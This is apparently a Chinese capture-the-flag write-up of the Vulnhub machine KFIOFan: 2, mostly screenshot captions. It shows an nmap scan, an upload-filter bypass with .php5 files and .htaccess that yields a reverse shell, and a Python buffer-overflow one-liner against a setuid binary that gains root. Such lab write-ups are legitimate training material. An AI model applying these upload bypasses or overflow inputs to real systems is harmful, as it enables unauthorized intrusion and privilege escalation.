主机扫描:

╰─ nmap -p- -A 10.10.202.152
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-29 16:55 CST
Nmap scan report for 10.10.202.152
Host is up (0.00098s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE VERSION
26921/tcp open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0          492658 Apr 19 08:36 1.png
| -rw-r--r--    1 0        0          398665 Apr 19 08:36 2.png
| -rw-r--r--    1 0        0          397987 Apr 19 08:36 3.png
| -rw-r--r--    1 0        0          526658 Apr 19 08:36 4.png
|_drwxr-xr-x    2 107      112          4096 May 16 00:15 serrure
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.202.146
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 00:0C:29:AB:34:EF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh

 

下4张图片,拼接起来,放大500%倍

cle.txt

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_02

 

╰─ echo "anything" > cle.txt

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh_03

 

 再次扫描

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_04

 

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_05

右键源码查看,发现文件OK,内容不正确,继续寻找内容

目录爆破:

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_06

 

 

cle.txt的文件内容通过参考大神的手册,作者曾经写过相关的文章,有一句话名言。Khaos Farbauti Ibn Oblivion

echo "Khaos Farbauti Ibn Oblivion" > cle.txt

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh_07

 

再次访问:

http://10.10.202.152:26980/index.php

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh_08

 

 经过尝试,上传.php文件失败,可以上传 .php3 .php5 .phtml等文件

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh_09

 

尝试反弹shell,发现php5 无法解析

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_10

 

 

创建

╰─ touch .htaccess 然后上传,访问php5文件,获取shell

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_11

 

寻找下可用的信息:

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh_12

 

再次扫描下,看看是否开放了其他端口

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_13

 

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh_14

 

顺利登陆,接下来按道理要进行root提权操作

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_15

 

bob@kfiofan2:~$ file test
test: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=682d6c9e7e15e75e2301db8009c0011d439910ea, not stripped

看起来是个可执行文件,但是执行的时候,需要密码验证

我们使用string 看下文件

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh_16

 

发现几个关键的信息,系统执行命令,创建认证文件的操作,一个疑是执行文件的密码

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_17

 

翻译过来这个意思。。。。

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh_18

 

我们进行gdb调试改程序吧

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh_19

 

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_20

 

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_21

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_22

 

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_23

 

CTF KFIOFan: 2 Vulnhub Walkthorugh_CTF KFIOFan_24

 

python -c 'print ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6"+"\x20\x48\x55\x55\x55\x55")' | ./test

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh_25

 

退出重新登录,即可获取root权限。

CTF KFIOFan: 2 Vulnhub Walkthorugh_Vulnhub Walkthorugh_26

 

好多二进制的东西不太懂,参考大神文档操作,哈哈!!!